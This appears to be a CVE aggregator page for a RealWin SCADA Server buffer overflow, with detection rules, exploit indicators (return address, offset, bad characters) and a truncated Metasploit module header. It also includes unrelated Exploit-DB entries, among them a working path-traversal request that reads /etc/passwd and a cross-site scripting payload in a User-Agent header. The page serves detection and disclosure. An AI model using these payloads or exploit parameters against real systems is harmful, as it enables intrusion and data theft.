CVE-2008-4322
published 2008-09-29CVE-2008-4322: Stack-based buffer overflow in RealFlex Technologies Ltd. RealWin Server 2.0, as distributed by DATAC, allows remote attackers to execute arbitrary code via a…
PriorityP269critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
64.83%
99.1th percentile
Stack-based buffer overflow in RealFlex Technologies Ltd. RealWin Server 2.0, as distributed by DATAC, allows remote attackers to execute arbitrary code via a crafted FC_INFOTAG/SET_CONTROL packet.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realflex_technologies_ltd | realwin_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
|10 23 54 67 00 08 00 00|
bytes↗
|e3 77 0a 00 05 00 04 00 00 00|
snort
alert tcp $EXTERNAL_NET any -> $HOME_NET 910 (msg:"ET SCADA DATAC RealWin SCADA Server Buffer Overflow"; flow:established,to_server; content:"|10 23 54 67 00 08 00 00|"; depth:8; content:"|e3 77 0a 00 05 00 04 00 00 00|"; within:10; isdataat:744,relative; content:!"|0a|"; within:744; reference:url,www.securityfocus.com/bid/31418; reference:cve,2008-4322; reference:url,secunia.com/advisories/32055; classtype:attempted-user; sid:2012096; rev:2; metadata:created_at 2010_12_23, cve CVE_2008_4322, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_08_19;)
- →Exploit packet targets TCP port 910 (RealWin SCADA Server default port); monitor for inbound connections from external hosts to this port. ↗
- →The malicious FC_INFOTAG/SET_CONTROL packet begins with the 8-byte magic header 10 23 54 67 00 08 00 00 at depth 0, followed within 10 bytes by e3 77 0a 00 05 00 04 00 00 00; both patterns must be present to confirm exploit attempt. ↗
- →After the second content match, the exploit payload spans at least 744 bytes and must not contain a 0x0a (newline) byte within that range — use isdataat:744,relative and content:!|0a| within:744 to confirm overflow-sized payload without bad chars. ↗
- →The exploit uses bad characters \x00\x20\x0a\x0d; shellcode in observed traffic will not contain these bytes, which can help distinguish exploit payloads from benign data. ↗
- →The return address used in the Universal target is 0x4001e2a9; presence of this 4-byte little-endian value (a9 e2 01 40) at offset 740 within the packet body is a strong indicator of this specific exploit module. ↗
- ·The Metasploit module targets specifically RealWin SCADA Server 2.0 Build 6.0.10.37; the hardcoded return address 0x4001e2a9 and offset 740 are version-specific and may not apply to other builds. ↗
- ·Payload space is constrained to 550 bytes with a stack adjustment of -3500; detection rules or shellcode scanners should account for this relatively small payload window. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET SCADA DATAC RealWin SCADA Server Buffer Overflow
suricata·2010-12-23
CVE-2008-4322 ET SCADA DATAC RealWin SCADA Server Buffer Overflow
ET SCADA DATAC RealWin SCADA Server Buffer Overflow
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 910 (msg:"ET SCADA DATAC RealWin SCADA Server Buffer Overflow"; flow:established,to_server; content:"|10 23 54 67 00 08 00 00|"; depth:8; content:"|e3 77 0a 00 05 00 04 00 00 00|"; within:10; isdataat:744,relative; content:!"|0a|"; within:744; reference:url,www.securityfocus.com/bid/31418; reference:cve,2008-4322; reference:url,secunia.com/advisories/32055; classtype:attempted-user; sid:2012096; rev:2; metadata:created_at 2010_12_23, cve CVE_2008_4322, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_08_19;)
Exploit-DB
DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-4322 DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit)
DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit)
---
##
# $Id: realwin.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DATAC RealWin SCADA Server Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in DATAC Control
International RealWin SCADA Server 2.0 (Build 6.0.10.37).
By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,
an attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:
Exploit-DB
CMS Made Simple 1.4.1 - Local File Inclusion
exploitdb·2008-11-29
CVE-2008-5642 CMS Made Simple 1.4.1 - Local File Inclusion
CMS Made Simple 1.4.1 - Local File Inclusion
---
Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
Vendor: CMS Made Simple
Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
Author: M4ck-h@cK
Date 29.11.2008
Home: sweet home
contact: no, thx :)
Exploit:
Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]
GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: demo.cmsmadesimple.fr
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache
It's possible to set "cms_language" value in order to view /etc/passwd file.
# milw0rm.com [2008-11-29]
Exploit-DB
Liferay Enterprise Portal 4.3.6 - User-Agent HTTP Header Cross-Site Scripting
exploitdb·2008-01-31
CVE-2008-0178 Liferay Enterprise Portal 4.3.6 - User-Agent HTTP Header Cross-Site Scripting
Liferay Enterprise Portal 4.3.6 - User-Agent HTTP Header Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/27547/info
Liferay Enterprise Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects Liferay Enterprise Portal 4.3.6.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)script>alert('XSS !!!')/script>
Metasploit
DATAC RealWin SCADA Server Buffer Overflow
metasploit
DATAC RealWin SCADA Server Buffer Overflow
DATAC RealWin SCADA Server Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.0.10.37). By sending a specially crafted FC_INFOTAG/SET_CONTROL packet, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://reversemode.com/index.php?option=com_content&task=view&id=55&Itemid=1http://secunia.com/advisories/32055http://www.kb.cert.org/vuls/id/976484http://www.securityfocus.com/archive/1/496759/100/0/threadedhttp://www.securityfocus.com/bid/31418http://www.vupen.com/english/advisories/2008/2694https://exchange.xforce.ibmcloud.com/vulnerabilities/45465http://reversemode.com/index.php?option=com_content&task=view&id=55&Itemid=1http://secunia.com/advisories/32055http://www.kb.cert.org/vuls/id/976484http://www.securityfocus.com/archive/1/496759/100/0/threadedhttp://www.securityfocus.com/bid/31418http://www.vupen.com/english/advisories/2008/2694https://exchange.xforce.ibmcloud.com/vulnerabilities/45465
2008-09-29
Published